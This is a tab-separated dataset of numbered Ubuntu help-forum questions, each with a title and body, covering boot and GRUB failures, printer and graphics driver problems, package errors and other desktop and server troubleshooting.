519357	initramfs menu ! ! ! ! how do i boot ?	i restarted my pc after a update which said it had and error occurred , but did not affect any thing at the time . when it booted it went to a black screen and said : gave up waiting for root device . common problems : boot args ( cat /proc/cmdline ) -check rootdelay= ( did the system wait long enough ? ) -check root ( did the system wait for the right device ? ) -missing modules ( cat /proc/modules ; is /dev ) alert ! /dev/disk/by-uuid/38f8cda2-efdd-4c69-bffb-0e243098686a does not exist . busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) buit-in shell ( ashe ) enter 'help ' for a list of built-in commands . how do i boot my ubuntu ? ? ? help please ! ! ! !
519358	live usb is n't live , i can only try or install	i 've tried about 4 times now to create live ( by live i mean i can boot ubuntu from it ( i think , i 'm a newbie to this ) ) ubuntu usb , to no avail . i want a live usb because my grub is n't showing up since i reinstalled windows 7 , so i want to go to ubuntu , and use the terminal to fix this .
519359	ca n't boot from windows 8 to ubuntu error in file \efi\ubuntu\grubx64.efi	first of all i had a pre-installed windows 8 on my laptop device ( toshiba ) then i wanted to install ubuntu linux alongside with windows 8 . i installed it regularly then i had a problem that i could n't boot to windows 8 , so i made boot repair in ubuntu then i had a new problem is that the computer open windows 8 immediately , so i installed easybcd on windows 8 and i 've changed some settings now i have a boot menu with ubuntu and windows 8 but when i choose ubuntu a black screen appears with some instructions and says that this file : \efi\ubuntu\grubx64.efi is missing or has an error ?
519362	hp p1102 printer not working properly	i had to re-install ubuntu 12.04 . my hp laserjet p1102 is now printing at a very low dpi ( for want of a better description ) . it prints in a very rough draft quality only . i went into `` settings '' and added the printer again , but no improvement . do i need a plug in ? if so , how do i go about installing it ? update : i just tried printing from libreoffice writer and it seems to be working fine . however , when i print out an email from gmail i have the problem of very poor quality .
519368	could there arise any problem after writing 64bit-iso to usb using 32-bit pc ?	i have problems with my pc ubuntu 14.04.1 , 64 bit and want to chroot into it . i have a 32 bit installation on usb stick , which is ok for fsck on 64 bit , but not for chroot . so i need a 64 bit iso dd-ed to a usb stick . but i have available only a 32 bit computer . in my understanding it should n't matter , but i 'm not sure ...
519369	gmail forces ubunto to lockup ? any suggestions ?	heading south i installed the latest ubuntu , gmail and several other apps . today gmail locks up the system , forcing a complete freeze . anyone else having same issue ?
519371	how do i make arandr config persistant ?	xubuntu 14.04.1 64 bit . i am using arandr and have set up dual monitors and saved the config file to ~/.screenlayout . however each time i boot the computer i have to activate the saved layout . i would like to make the changes persistant . can anyone advise me how to do this ?
519372	ubuntu and asus g750jm , gtx860m / nvidia problems	this is my second thread , the other is on another website but that one is going no where and i do n't think it gets enough attention so i 'm posting here . has anyone gotten drivers to work the gtx860m in ubuntu 14.04 ? if so , how did you go about the task ? i 'm running out of options , here 's what i 've tried : https : //devtalk.nvidia.com/default/topic/771674/linux/ubuntu-freezes-at-login-with-the-gtx860ms-official-drivers-installed-/
519374	can i run ubuntu ? this is my configuration	i want know if i can install os ubuntu in my pc this my configuration ! ! intel ( r ) core ( tm ) 2 duo cpu e6750 @ 2.66ghz ( 2cpu ) , ~2.7ghz memory:2048mb ram intel ( r ) q35 express chipset family total memory 256mb
519375	anybody know how to delete a file from qml without resorting to a c++ plugin ?	anybody know how to delete a file from qml without resorting to a c++ plugin ? it should be possible to do in the folder that my app uses for data storage .
519376	how to prevent cdemu to startup on every session on kubuntu ?	i tried to stop cdemu ( a program for mounting cd images on virtual devices ) to start every time i turn my computer on , but could n't . there is no link to cdemu on the startup folder , and the program has not these settings . please help , i bet it makes the system startup slower .
519377	dpkg : -- dry-run does not check dependency ?	the following practice indicates that `` dpkg -- dry-run '' does not perform dependency checking , or at least i do n't know how to do it . if i want to make sure dependency is clear before installing package , what should i do ? thanks a lot for the help . $ sudo dpkg -i -- dry-run bsdgames_2.17-21_amd64.deb ( reading database ... 120870 files and directories currently installed . ) preparing to replace bsdgames 2.17-21 ( using bsdgames_2.17-21_amd64.deb ) ... $ echo $ ? 0 $ sudo dpkg -i bsdgames_2.17-21_amd64.deb ( reading database ... 120870 files and directories currently installed . ) preparing to replace bsdgames 2.17-21 ( using bsdgames_2.17-21_amd64.deb ) ... unpacking replacement bsdgames ... dpkg : dependency problems prevent configuration of bsdgames : bsdgames depends on wamerican | wordlist ; however : package wamerican is not installed . package wordlist is not installed . dpkg : error processing bsdgames ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... errors were encountered while processing : bsdgames clarification i do n't want dpkg to install dependencies for me . i only want some command to check dependency of the package . if the command returns 0 , that means the current system has all the depending packages . this is all i need .
519378	how do i delete files that my app owns from qml ?	my app imports files from contenthub and saves them into ~/.local/share/applications/ $ { myappid } /pictures/ and i would like to be able to delete them when the user no longer wants them .
519379	surver 12.xx to 14.04 can i do it tiwce	so long story short , the update was stopped mid stream . i can boot to 14.04 but its slow and terrible , and is quite obviously broke . how can i force it to `` upgrade '' again ?
519380	is ubuntu still toxic to macs with fusion drive ?	installing ubuntu broke my ( since-repaired ) fusion drive . i burned ubuntu-12.04-desktop-amd64+mac.iso to a dvd , and booted it and i asked it to install beside my osx install on my homemade* fusion drive on my macbookpro4,1 . instead , it created a linux swap partition ( disk0s5 ) , a non-bootable ( even via refind ) partition ( disk0s4 ) of the new new linux filesystem data partition type , and made my osx install non-bootable by changing the partition type of half of my fusion drive to ffffffff-ffff-ffff-ffff-ffffffffffff . i revived my system by changing the partition type back to apple corestorage so , any tips for how to make refind boot the ubuntu install on my disk0s4 ? ( or otherwise get ubuntu installed safely beside my existing osx fusion drive ? ) tia . i already tried creating /efi/refind/drivers_x64/ and putting ext2_x64.efi in it . my refind.conf is still in the default config . i ca n't mount disk0s4 . -- *my homemade fusion drive has been working well for many months ; yes it really works ; i get the speedup and it keeps 4gb free on the ssd and moves stuff , as shown by iostat -w9 .
519381	top tool bar sound issue	when i turned down the volume from the option in the top right , the volume stayed at that level and would not get any louder . repeating this action made the volume down to a whisper . i have checked the speakers and headphones . i have plugged and unplugged both and the volume is at max on the speaker . i also checked the sound options and set them to max to no avail . i am not sure how to work around this issue . ubuntu 14.04.1 32 bit
519382	installing windows in ubuntu installed hard disk partition	i was trying install windows on my ubuntu laptop , i have only one disk partition on which i have istalled ubuntu , while trying to installing windows i got an error that `` windows can not be installed in this drive , windows supports only ntfs file system , how can i install windows in an ubuntu ext3 file system ?
519385	error on update	i got this error message when trying to update : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/ug.archive.ubuntu.com_ubuntu_dists_precise- backports_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . ' what does this mean ?
519386	& & command string question	so i was wondering if it would be possible to run the command : sudo apt-get update & & sudo apt-get upgrade & & sudo pm-suspend as you can probably work out for yourself , i wish to update software when i go to bed , but have it suspend once it is done ? i would try it , but putting it bluntly , i 'm afraid of breaking something . thanks in advance
519387	will this answer work with 14.04.1 ?	i am about to install owncloud on ubuntu server 14.04.1 and i want to know if this answer owncloud server on ubuntu 12.04 would work on 14.04.1 .
519390	what happened to `recent files ' feature in document viewer ( evince ) ?	most of the currently available applications provide a way to open the recently accessed files from it . in the previous versions of document viewer , i could see a list of recently opened files . however , in recent versions of document viewer , i find that this previously available feature is no longer present . when you use the file menu after launching document viewer , there is no list of recent files . when you click on open , the recently used entry , available by default in other ubuntu applications is not there . only after you have opened a file , and click on file- > open , you can get a list of recent files . i feel that a very useful feature has been withdrawn . or am i missing something here ? i am using document viewer 3.10.3 in ubuntu 14.04 , updated regularly . do you think there is way out of the situation ?
519397	awk : runaway regular expression	i can run command on ubuntu : free | grep mem | awk ' { print $ 3/ $ 2 * 100.0 } ' and get result : 20.1092 but when i try to put it in alias : alias memtotal= '' free | grep mem | awk ' { print $ 3/ $ 2 * 100.0 } ' '' it do n't work : $ memtotal awk : line 1 : runaway regular expression / * 100.0 } ...
519398	suspend not working - ubuntu 14.04 lts	i am using ubuntu 14.04 lts , i have had this problem since i installed ubuntu . when i click the suspend button the computer goes into a suspend like feature and the power button starts flashing showing that the computer is in a hibernation/sleep mode . when i push any buttons or move the mouse the power light turns on all the way and the screen stays powered off . os specs : ubuntu 14.04 lts 64 bit computer specs : hp envy 6-1019nr , sleekbook amd a6 4 gb ram 500 gb hdd 32 gb ssd please do n't mark this as a duplicate as i have not found anything that has helped me .
519400	how to change internal ip address from dhcp to static ?	i have a pc running ubuntu server 14.04.1 . the internet was set up using dhcp i believe . i want to keep the same ip and subnet i have now but just change it to static for the internal ip .
519401	printer in `` pending '' mode only , not printing	os : ubuntu 13 printer : hp deskjet 2540 problem : printer worked initially . suddenly stopped working . printer cue just says `` pending '' and printing never happens . how do i get it to go from `` pending '' to `` printing '' ?
519402	guides to download videos with wget do n't work	i know this is somewhat of a duplicate question , but all the others i 've seen answered never really answered the question , `` how to i download videos using wget ? '' all of the previous answers just seem to suggest other means to download the videos , like youtube-dl . i 'm interested how to use wget specifically though . it looks like a handy tool to use , but every guide i 've found gives directions that do n't work , and every question answered on multiple forums just avoids the question and suggests alternatives . i 've found these two guides : http : //go2linux.garron.me/wget-to-download-youtube-videos & http : //www.marksanborn.net/howto/using-wget-to-download-youtube-videos/ the first works up until the last step where i get a 404 error . i would give the exact error but for some reason i ca n't even get the second step to work today ? ? following the second guide , only the first step works so i do n't even know if it 's useful . i know there are plenty of great plugins and programs available , but if anyone knows how to use wget i would appreciate any insight .
519406	usb 3.0 , msata , ssd in enclosure connecting then disconnecting . what is happening ?	i have a mstat ssd that i have put into a usb 3.0 enclosure and it is not working . when i connect my drive , it will mount but after about a few seconds it will disconnect . sometimes it will continuously connect and reconnect . if i run dmesg i get the following which should capture what is going on from when the drive connects to when it disconnects . > dmesg [ 5835.154661 ] usb 3-1 : new superspeed usb device number 13 using xhci_hcd [ 5835.171471 ] usb 3-1 : new usb device found , idvendor=174c , idproduct=55aa [ 5835.171481 ] usb 3-1 : new usb device strings : mfr=2 , product=3 , serialnumber=1 [ 5835.171486 ] usb 3-1 : product : atlas flux [ 5835.171490 ] usb 3-1 : manufacturer : mushkin [ 5835.171494 ] usb 3-1 : serialnumber : 00000000000000000000 [ 5835.172986 ] usb-storage 3-1:1.0 : quirks match for vid 174c pid 55aa : 400000 [ 5835.173054 ] scsi130 : usb-storage 3-1:1.0 [ 5836.169595 ] scsi 130:0:0:0 : direct-access mushkin atlas flux 0 pq : 0 ansi : 6 [ 5836.171279 ] sd 130:0:0:0 : attached scsi generic sg1 type 0 [ 5836.172226 ] sd 130:0:0:0 : [ sdb ] spinning up disk ... [ 5836.376733 ] usb 3-1 : usb disconnect , device number 13 [ 5837.171395 ] .ready [ 5837.171705 ] sd 130:0:0:0 : [ sdb ] read capacity ( 16 ) failed [ 5837.171714 ] sd 130:0:0:0 : [ sdb ] [ 5837.171718 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 5837.171722 ] sd 130:0:0:0 : [ sdb ] sense not available . [ 5837.171925 ] sd 130:0:0:0 : [ sdb ] read capacity failed [ 5837.171933 ] sd 130:0:0:0 : [ sdb ] [ 5837.171937 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 5837.171941 ] sd 130:0:0:0 : [ sdb ] sense not available . [ 5837.172034 ] sd 130:0:0:0 : [ sdb ] write protect is off [ 5837.172044 ] sd 130:0:0:0 : [ sdb ] mode sense : 00 00 00 00 [ 5837.172118 ] sd 130:0:0:0 : [ sdb ] asking for cache data failed [ 5837.172127 ] sd 130:0:0:0 : [ sdb ] assuming drive cache : write through [ 5837.172518 ] sd 130:0:0:0 : [ sdb ] read capacity ( 16 ) failed [ 5837.172526 ] sd 130:0:0:0 : [ sdb ] [ 5837.172529 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 5837.172533 ] sd 130:0:0:0 : [ sdb ] sense not available . [ 5837.172605 ] sd 130:0:0:0 : [ sdb ] read capacity failed [ 5837.172611 ] sd 130:0:0:0 : [ sdb ] [ 5837.172613 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 5837.172617 ] sd 130:0:0:0 : [ sdb ] sense not available . [ 5837.172666 ] sd 130:0:0:0 : [ sdb ] asking for cache data failed [ 5837.172672 ] sd 130:0:0:0 : [ sdb ] assuming drive cache : write through [ 5837.172676 ] sd 130:0:0:0 : [ sdb ] attached scsi disk [ 5837.173696 ] usb 3-1 : set sel for device-initiated u1 failed . [ 5837.173709 ] usb 3-1 : set sel for device-initiated u2 failed . i also find that it i use a different usb cable that the drive does not connect at all . maybe that cable is bad . i run ubuntu 12.04 . i tested the drive on another computer and it works fine . it does n't seem to be a problem with the drive but with the computer . any suggestions ?
519407	difficulty booting ubuntu from usb	hi i am trying to run ubuntu alongside win8.1 but i am having difficulty getting ubuntu to boot from my usb , i have had no problems with installing ubuntu on my other computers via usb but whenever i try to boot from the usb with my main computer , i get a purple screen with a image at the bottom ( sometimes ) . after that the screen goes black with a purple line down the left hand side and it seems to stop doing anything . i am not sure where to go from here . my pc does not support secure boot either . i am trying to run ubuntu 14.04.1 and this problem has happened on previous versions . pc specs : intel i5 3570k asrock z77 windows 8.1 ( currently boots of a samsung ssd ) -
519411	ubuntu 14 amarok error , when starting up ?	i just installed ubuntu 14 and everything was working , now after a few other installs i get this error when trying to start up amarok error - amarok could not enter folder /boot/lost+found . i have searched google and found nothing . every other app seems to work fine . i dont get it . any help would be greatly appreciated .
519412	ubuntu gparted does not reformat an existing partition	2014-09-02 my dual-boot computer had its linux mint 11 installed first at /dev/sda1 and then ubuntu 12.04 at /dev/sda2 . since i no longer need linux mint 11 , i would like to delete it safely by reformatting it ( to ext4 ) via gparted from ubuntu . even though gparted appears to have reformatted this partition by indicating zero disk-space usage in the partition , i still see mint 11 in the boot-up menu afterwards when i open gparted again after a reboot , i see mint 11 still occupying the same amount of disk space as previously . in other words , gparted has not been effective . the results are the same regardless of whether i perform the reformatting from ubuntu 12.04 or an ubuntu live cd . these are the steps i 've been using to reformat /dev/sdda1 to `` remove '' mint 11. sudo gparted ( to reformat /dev/sda1 to ext4 ; gparted immediately shows it as an empty partition ) sudo update-grub ( linux executes this command error-free sudo reboot ( ubuntu 12.04 still shows linux mint 11 in boot-up menu ) sudo gparted ( once again shows /dev/sda1 unchanged as before , namely the partition appears unchanged by my actions ) can someone tell me where i have gone wrong ? thank you very much . julianloui 2014-9-04 today i discovered something very strange when i booted up ubuntu 12.04 . the grub boot menu no longer listed linux mint 11 even though 'sudo gparted ' still showed /dev/sda1 as a non-empty partition as before . does this imply that it had taken gparted so long in the past two days to complete the change i ordered ? i guess that essentially i 've realized my objective . i like to correct an earlier observation i reported . actually the post-change /dev/sda1 partition 's used space was only 1/40 of the entire allotted space . i offer my apology to all and my thanks to marty for his input . julianloui
519413	can not update/get any packages . gedit not installed	my problem is that my sources.list is out of date for some reason . i already found the fix in another port , but it does n't work . it says to use gedit to edit sources.list and replace everything with the proper sources . well , for some reason i do n't have it installed ( ubuntu server 14.04 ) and i ca n't install it or else i get the main problem again . failed to fetch http : // some ubuntu site could not resolve hostname `` us.archive.ubuntu.com '' is there any other way to edit sources.list ? or do i need to do a re-install of the os ?
519415	remote ubuntu server terminal over internet without ip public	is there any alternative teamviewer to remote ubuntu server using terminal without ip public or ssh , because the server only using local ip , but having internet access i can not use vnc , remmina or any others that ask ip public using ssh , i need an application thats run most likely teamviewer only using id and password , but teamviewer unfortunately does n't support remote via terminal . so if anyone have tried remote ubuntu server over internet using id give me the application name and how to use it in terminal thanks
519416	changing administrator	due to a mishap with my main profile i am wondering if anyone could assist me in making my secondary profile the administrator . something went wrong with my primary profile and i can no longer see anything but my desktop/shortcuts . i can not get the command terminal to pop up or anything . considering this last piece of information , i am interested in giving my secondary profile the administrator position so that i can use sudo commands . otherwise , i can not properly download programs . is there anyone who has knowledge on how to do this or has any other suggestions i can attempt ? thank you in advance ! aaron
519417	14.0.4.1 - installed , loaded once , reboot unable to find boot device	i have been attempting to setup an ubuntu desktop pc , however every time i perform the installation ( goes through fine ) and then do the first time load ( still fine ) i then reboot the machine only to receive an error stating that a boot device can not be found . i have attempted multiple installs , a few different ubuntu versions , all with the same results . when i `` try ubuntu w/o installing '' i am able to see the hdd and even the ubuntu install , so it seems to be there , and it did load the first time just after install . i have attempted to play with the uefi settings ( have tried a handful of different combinations over the last few weeks ) none of which seem to give any positive results . any help would be greatly appreciated . i 'm also still somewhat new , so if there is any information that would help someone troubleshoot this with me , just let me know and i will get it if i can .
519423	can not access files second hard drive until opened from unity bar	i have ubuntu 14.04 lts and windows 8 installed side by side on my first hard drive.most of the files on my second hard drive were all created previously in my windows system until recently i have also put a few files while i am using ubuntu . ubuntu can recognize my second hard drive and there is an icon on the unity bar where i can open the drive , browse , or edit files . i have created some shortcuts for some file folders on my second hard drive with right click and make link . i have put these links into my home folder . i noticed these links are not valid on ubuntu boot . once i open my second hard drive from clicking the icon on my unity bar , these links became valid again . i was wondering why this is like that and whether there is a way for the links to be valid on system boot . thanks , update : i used the method in this link . a couple notes : i had to find startup applications in unity dashboard search . had to install udisks via command line apt-get install udisks . afterwards the selected answer method worked fine for me .
519424	problem with deleting a directory and subdirectory	root @ umar : /home/umar # rmdir /usr/local/reliance_netconnect rmdir : failed to remove ‘/usr/local/reliance_netconnect’ : directory not empty
519426	cryptkeeper not opening encrypted folders after upgrade to 14.04	i upgraded today to ubuntu 14.04 , and now , a folder i had encrypted using cryptkeeper that is located on an external hard drive will not open . cryptkeeper launches , and the folder is listed , but when i click on it , i get a message saying `` this encrypted folder is currently not available ; it may be located on a removable disk , or has been deleted . '' the external hard drive is mounted and browsable , and i can see the folder , but am unable to open it . is there a way to get access to this folder again ? thank you .
519427	random crash no logs found , weird symptoms	i am getting some random crashing . i am running a lenovo x1 ( ssd ) with ubuntu 14.04 . the symptom i get is my entire machine locks up and becomes unresponsive , can not get into any tty terminal etc . requires hard boot . i see nothing in the /var/logs to detect the error . the other weird issue , if i am running my text editor ( rubymine ) when the crash happens , the file i am working on has all it 's content deleted . i suspect it is a hdd issue ? but when i run sudo badblocks -v nothing is reported . wondering what else i might do ? what logs i might check ? crash happens often . usually only when i am working with multiple programs open for a while .
519440	no mail in `/var/mail`	i am trying to setup my system mail to monitor my mdadm raid arrays but i have no mail in /var/mail . how can i set this up and how can i test it ? there should be something in may mail account i would think but nothing is ... thanks edit 1 ** in response to **answer 1 there 's no maillog on my system : $ tail -f /var/log/maillog tail : can not open â/var/log/maillogâ for reading : no such file or directory $ echo my test 1 | mail -s test1 root $ i 'm using linux , kubuntu 14.04 but have no postfix setup , do i need to in order to retrieve system mail ?
519443	update package broken	error brokencount > 0 details refer to lib6 dependencies i had attempted to up grade from 12.04 to 14.04 but the upgrade package advised me not to because my graphics hardware might not be good enough . after i did n't continue the system upgrade , the broken package message appears in update manager .
519444	how to install ubuntu 12.04 desktop os using kickstart	i want to install ubuntu 12.04 desktop os using the kickstart can any one help me please what type service need to install and on client install what to type where to type
519450	error while installing kubuntu 14.04 in virtual machine	running kubuntu 14.04 in virtual machine gives me an error : - boot : could not found kernel image : vmlinuxz.efi how can solve these ?
519451	is source code for bash sufficient , when i want source code of ext4 ?	when i want to know the source code of ext4-filesystem ( mkfs.ext4 ) - is it then sufficient to download the source code for bash ? - or do i need else source-codes after i did : sudo apt-get install dkpg-dev then i did sudo apt-get source bash or is there more to be done ?
519452	aptana studio - file does not exist	i am unable to load my projects into project explore . when i try to open this project by navigating index.html , it show me that file not exist..
519453	why i ca n't close the windows with ( x ) tab	when i open any windows , i ca n't close it with ( x ) . so i should close windows with right click on the bar below . when i open many windows , if i close with ( x ) the windows that closed is behind of current windows that i clicked . so , i want to ask , how the way to set up this ... sorry for my bad english
519454	how to automount partition at startup or login ?	with my previous installation i just had /usr/bin/udisks -- mount /dev/sda2 & & /usr/bin/udisks -- mount /dev/sda3 among the startup applications , but on my new installation ( also 12.04.4 ) it has no effect . the command works fine in the terminal . autostarting firefox using the startup applications tool works also . how do i automount those partitions ? ( no , update does not help ! )
519457	ubantu not booting from usb	i have windows 8.1 installed in my laptop . i have burnt ubantu 14.04.1 in to usb . but when i restart my laptop & go to boot menu ubantu can not boot from usb . i have done separate partition of 20 gb . please help me to install from usb..also i have tried wubi for 12.04 bt it gives error . i want to install ubantu alongside windows with dual boot . update i have done booting from usb helping with answers . and now on installation step , when i choice `` install ubuntu alongside windows 8 '' , i have no `` continue '' option button to continue installation . here is the screen shot of this step :
519460	playbin2 video scaling	i have a small issue i am using the `` playbin2 '' element in my video player app . now i wish to have control over the scale of my video , basically achieve the same funcationality as `` videoscale '' . how do i do it ? ?
519462	how to manage files in ipod with kubuntu	i 'm trying kde plasma . however , i found i ca n't manage files ( not just music and photos ) in my ipod like a u-disk with kubuntu 14.04 . but when i use ubuntu and nautilus , my ipod performs like a simple u-disk . which lib should i install to manage my files in ipod ?
519463	/boot/grub/i386-pc/normal.mod not found in grub rescue	i dun goofed . so i have an old macbook pro and i wanted to wipe it clean and install linux on it . in the process of doing so , i completely removed mac os x which i was okay with , but the linux installation failed because i mistakenly said it was okay to continue without a bootloader partition . basically every time i boot i get the message /boot/grub/i386-pc/normal.mod not found grub rescue > but here 's my predicament : i 've searched all the partitions with ls and on the right one , /boot/grub/ has only one thing in it , gptxblacklist.txt or something . also , anytime i try to plug in a liveusb to try again and select `` try ubuntu '' all i get is a black screen with a small line of pixels . i 'm losing faith that this is even recoverable : / if it 's not , what can i do to maybe hardware reset the macbook so i can start over ? is that possible ?
519464	sane support for canon lide 220 ?	i ordered a canon lide 210 scanner because the sane website says it 's `` completely '' supported . the vendor delivered a canon lide 220 , and it 's not recognized . is this fixable , or must i return the scanner ?
519465	the output when i start firefox from terminal	i was curious and wanted to see if i could start firefox using terminal . so i typed firefox in terminal , and it displayed the message below ( process:5199 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed and firefox started running . but i am a little worried because the message above looks like an error message to me . can anyone tell me what it means ?
519467	problem with `` make gconfig ''	guys i tried to do `` make gconfig '' and after installing those packages ( gtk+-2.0 , glib-2.0 and libglade-2.0 and couple of more packages ) i still get error . could you check it out : root @ mosi-virtualbox : /usr/local/linux-2.6.32.2 # make gconfig hostld scripts/kconfig/gconf /usr/bin/ld : scripts/kconfig/kconfig_load.o : undefined reference to symbol 'dlopen @ @ glibc_2.1' //lib/i386-linux-gnu/libdl.so.2 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status make [ 1 ] : * [ scripts/kconfig/gconf ] error 1 make : * [ gconfig ] error 2
519469	pae kernel with 32bit os	we have procured dell blade m620 with 128gbram and dell rack r820 with 128gb ram servers . now on this i am required to install i386 12.04 server , as the application what we have runs on 32bit os only . can i install 32bit 12.04 with pae kernel on the hardware . regards kanak
519470	skype 4.3.0.37 stopped working after installation of nvidia 340.32 drivers	i did a fresh install of ubuntu 14.04 and tried skype , it worked . now i decided to install the video driver from nvidia website , install went successful but now skype is not starting anymore , no error , nothing . any help to diagnose this problem , please ? thank you .
519474	no desktop after login	i installed ubuntu 14.04 a month before in my vmware 10.0.3 but all of a sudden today , when i logged in , nothing would happen . i can not see my desktop or anything . just the wallpaper i had set was visible . any help anyone ?
519479	acer laptop support	well thing i did idk how i did it but i got it to do uefi on a non uefi ssd well to the main point is there any good acer laptops for installing ubuntu with no problem i am think about buying a new one next time i like acer i tryed a company like dell but i stil like acer the acer laptop i am using now and it works strait out i just install ubuntu and no bugs acer asphire v5 561pg-6819 it a powerful pc for the sale price i got it from future shop and i also want a one that can be uefi and i want it to be under 800 $ cad
519480	assigned access or guided access equivalent	is there a way to restrict user to use only one app in ubuntu ? in windows it is assigned access feature and in ios it is guided access feature .
519485	waiting for package manager lock	i am running kubuntu 10.04 on a macbook and can not use package manager . there is an icon in the taskbar which tells me 'refreshing package cache ( waiting for package manager lock ) ' please help , this is a fresh install .
519486	new tab after clicking a link	i recently visited a website and i clicked a link suddenly a new tab appears about a survey . was that a virus ?
519491	ubuntu stuck on black screen no options	i tried installing ubuntu on my pc and its just stuck and i 've left it alone for about 5 mins nothing . i have an amd fx-8350 with 660 2gb to and 8 gb of ram 2 . also 2 tb hdd if that matters . see the below image . i used yumi to put it on flash my stick is 64gb is formatted to fat32 . right from start of pc i booted into flash and nothing no options pop up no sound nothing just sits there blinking . [ img ] http : //i62.tinypic.com/2ljp0nr.jpg [ /img ]
519495	fastboot command error in ubuntu	i 'm currently trying out ubuntu via usb & get the following errors `` dfu-util not installed '' & `` fastboot not installed '' how do i correct this
519497	the password prompt re-appears after i successfully enter the correct administrator account password - what is going on ?	i enter the correct password in the dialog box , and the screen briefly fades before the dialog box reappears . i was able to log into another account fortunately , but ca n't seem to repair my usual account with administrative privileges . i was able to enter the admin password under user settings and confer admin privileges to this other account , but it would be nice to have access to the original , especially since i seem not to be allowed to add users to the sudoers file ( sudo adduser username sudo ) .
519498	error while installing lamp-server	i want to install lamp-server via tasksel . but when i enter the command : sudo tasksel install lamp-server , i get error : locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_paper = `` fa_ir '' , lc_address = `` fa_ir '' , lc_monetary = `` fa_ir '' , lc_numeric = `` fa_ir '' , lc_telephone = `` fa_ir '' , lc_identification = `` fa_ir '' , lc_measurement = `` fa_ir '' , lc_time = `` fa_ir '' , lc_name = `` fa_ir '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . /usr/bin/locale : can not set lc_all to default locale : no such file or directory tasksel : aptitude failed ( 100 ) what should i do ? update : the output of locale -a : c c.utf-8 en_us.utf8 posix
519499	does ubuntu treat downloaded files specially ?	there is a script which just adds extra lines to my /etc/hosts file to enable local development . since it 's pretty useful , i decided to keep it in a gist . when one of my friends downloaded the shell-script , changed the necessary permissions and tried to run it , it failed . the error shown is : $ ./dev-mode : no such file or directory even though the script runs perfectly file on my computer . the /etc/hosts file exists in both our computers , the permissions and the owners are the same . every thing is absolutely similar . then he made a new file , copied the contents of the script to the new file , and changed the necessary permissions , and it ran ! to my eyes , there is no conceivable difference between the two files , but a diff does that they are difference , but does n't highlight any line or any character ... nothing . the permissions are same , etc . does ubuntu treat downloaded files somehow differently , and stop it from running ? absolutely same files , one runs and the other doesn't
519501	can i use my serial receipt printer as an emergency console ?	i recently came into possession of a serial receipt printer and i would like to know if i could use it as an emergency print-out console for the following purposes : kernel panic ( stack traces ) any errors failed login attempts ( includes sudo attempts ) root access granted ( through sudo or other ) this is for a headless server . i would like to have a printed report instead of having to ssh in all the time and check n+1 different logs . also , it would just look uber nerdy and cool .
519503	kubuntu 14.04 color correction - like intel hd and nvidia color correction in windows ( more colorfull screen )	my question is in the title . how to make that work ? my laptop is lenovo b570 - it has intel hd3000 and nvidia 410m my primary target for color correction is the intel card - and to have everything more colorful . a step by step guide please : ) thank you gรกbor
519504	can i lock a folder so nobody can delete it ?	i would like to create a folder in my opt directory on ubuntu 14.04 . however , it must have the following requirements : can not be deleted by anyone , even root . readonly access to all users ( except nobody ) write access only by my user ( test-user ) . root should n't be able to write .
519505	please help about my labtop	my laptop is acer 4820tg .is it work with ubuntu v.14 ? please answer me.i want to try ubuntu very much . thank you so much appreciate for answer .
519506	what data will be lost during upgrade from ubuntu 12.04 lts to 14.04 ?	presently running ubuntu 12.04 lts 64 bit with lots of other software . list of other software are listed below which i use most . oracle jdk apache http server tomcat mysql postgresql few cron jobs using crontab darktable gimp few of them installed using apt-get and others are installed from source inside /opt directory . now my questions are , if i upgrade my system to 14.04 lts using update manager prompt , what data will be lost ? do i have to install those software all over again ? afaik /home will be preserved . need to confirm .
519507	there is no desktop wallpaper at start up	i 'm running lubuntu 14.04 . a black screen and my desktop icons are there at start up , but not my wallpaper . if i click on the desktop number 1 or 2 the wallpaper appears immediately .
519509	mount .cdr file	i have a cd image which is in .cdr format . ( please note , it 's not the same as a corel draw image - which also uses the .cdr extension ) . is there any way to open it on ubuntu ? i do n't have a local cd drive - i just want to extract the contents to my hdd . it wo n't open with brasero , i ca n't mount it , nor extract it from the file manager . is there any way to convert it to a standard iso ?
519512	how to fix virtualbox resolution ?	i use ubuntu 14.04 in virtualbox . i have installed guest additions and it 's running good except for this really irritating problem in which my unity and lightdm interface is at full resolution whatever size the virtual machine windows size is but plymouth is at a wrong resolution . it is only correct if you run it at default windowed size . it is really irritating . do help please , cause it looks stupid .
519514	grub rescue , error : unknown filesystem	i am trying to boot xubuntu 14.04 but getting the following error : verifying dmi pool data ... ... ... ... . error : unknown filesystem entering rescue mode ... i tried the following commands : set root= ( hd0 , msdos6 ) set prefix= ( hd0 , msdos6 ) /boot/grub insmod normal but after typing 'insmod normal ' it simply says error : unknown filesystem and brings back the grub recovery prompt . as you can see here : specs : intel pentium d 3.00ghz , 2gb ram , gigabyte g41-m combo xubuntu 14.04 lts & windows xp
519517	status of rdp session manager sesman fail	i was using xrdp to remotely connect from my windows laptop to ubuntu server . it was doing ok but failed after a weekend all out of sudden . i did a > # service xrdp status and it returned : * checking status of remote desktop protocol server xrdp [ ok ] * checking status of rdp session manager sesman [ fail ] i can not find the solutions anywhere . please help .
519518	sound not working in ubuntu 14.04 lts after suspend	sound is working perfectly well in my system ( ubuntu 14.04 lts ) but when i suspend it , , there is no sound after that , , how to resolve this problem , ,and i am also curious about why it is not functioning after wake up from suspension ?
519521	canon laser shoot - lbp 1210 not working in ubuntu 14.04	i 've installed the latest version and it 's fine but not sure why it 's not working . i 'm giving some screen shots .
